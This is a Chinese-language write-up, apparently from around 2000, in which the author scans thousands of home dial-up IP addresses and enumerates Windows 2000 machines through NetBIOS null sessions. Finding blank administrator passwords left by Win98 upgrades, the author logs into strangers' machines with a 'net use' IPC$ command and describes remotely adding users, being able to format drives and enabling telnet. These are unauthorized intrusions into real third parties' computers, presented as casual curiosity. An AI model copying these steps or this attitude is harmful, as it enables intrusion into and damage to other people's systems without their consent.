Windows 2000 安全

目标: 我想要看 Windows 2000 安全性能怎么样, 因此我决定尝试一下 。对WIN2000基本的攻击应该使用 NT 4.0,来查询对方是否修补了漏洞 。我想你会很吃惊看到他们不但没有修补漏洞,还有新的漏洞出现 。我是一 名MCSE,因此微软向我提供了beta版本 。下面是我的评估 。
途径:
首先,我需要找一些使用WIN2000的普通用户,我打开IP SCANNER,找到大约6000个IP地址,这些IP都是长时间连线的拨号用户,并且分析出使用WIN2000的用户.好了,攻击开始;
首先使用Table 1.1这个工具,得到WIN2000的基本信息:
NetBIOS
Share Information
Share Name :IPC$
Share Type :Default Pipe Share
Comment :Remote IPC
WARNING - Null session can be established to 24.?.?.?IPC$
Share Name :ADMIN$
Share Type :Default Disk Share
Comment :Remote Admin
Share Name :C$
Share Type :Default Disk Share
Comment :Default share
Account Information
Account Name :Administrator
The Administrator account is an ADMINISTRATOR, and the passWord was changed 3
days ago. This account has been used 2 times to logon. The default Administrator
account has not been renamed. Consider renaming this account and removing most of
its rights. Use a different account as the admin account.
Comment :Account upgraded from Windows 95 or Windows 98
User Comment :
Full name :Administrator
Account Name :Guest
The Guest account is a GUEST, and the password was
changed 0 days ago. This account has been used 0 times to logon.
Comment :Built-in account for guest access to the computer/domain
User Comment :
Full name :
Account Name :USER1
The USER1 account is an ADMINISTRATOR, and the password was
changed 3 days ago. This account has been used 22 times to logon.
Comment :Account upgraded from Windows 95 or Windows 98
User Comment :
Full name :USER1
WARNING Administrator"s password is blank
WARNING USER1"s password is blank

我觉得很奇怪 。第一是管理员帐号和另外一个用户 ( 也一个主管 ) 口令是空白的 。这些帐号似乎是从Win98或95升级而来的,这引起了我的好奇,因此我决定了做一次尝试 。我升级了我的一台98的机器到 2000专业版 。这台机器在一个点对点的网络工作组里面,并且在该系统内有域主控服务器 。我按照提示步骤进行,升级过程很顺利 。重新启动后,出现设置新的WIN2000帐号密码的窗口,它给出一张在升级过程中创建的帐号列表,需要我为每个用户设置密码 。奇怪的是 。它竟然有和WIN98一样的密码设置安装的提示:[if you don not want to see
this screen again then just hit enter] 。我按下回车,进入WIN2000,而我机器上的
用户都把密码设置为空,这是不安全的,我又在另外几台WIN98机器上实验升级2000,都创建了密码为空的ADM用户 。
现在,继续攻击 。可能还会有其他的漏洞 。
我与这些机器建立了会话,用ADM登陆
C:>net use 24.?.?.?IPC$ "" /user:Administrator
The command completed successfully.
我现在作为一个adm连结到这台机器,并且能印射驱动器,并像自己的驱动器一样浏览它 。WIN98升级到WIN2000的这个密码设置的安全漏洞MS没有注意 。
我决定继续深入,希望发现WIN2000其他的漏洞我打开计算机管理器 ( PHOTO 1.2 ),与他的机器联接 。我可以像使用我本地机器一样的在远程机器上增加用户 。
photo 1.2
我深入研究计算机管理,并且发现那个磁盘管理也是脆弱的因此我能远程格式化他的驱动器 。我继续深入,注意到TELNET远程登录服务(POHOT1.3 )。
是microsoft在win2000的默认安装时设置了这个TELNET服务?一个普通用户需要telnet服务吗?这似乎是我在安装过程中设置的,它没由缺省启动,但是它被设置作为 Localsystem 登录 。好奇心使我继续研究.我看了服务的属性 ( photo.1.4 ) 并且发现不仅我能启动服务,而且我能使它自动启动 。

推荐阅读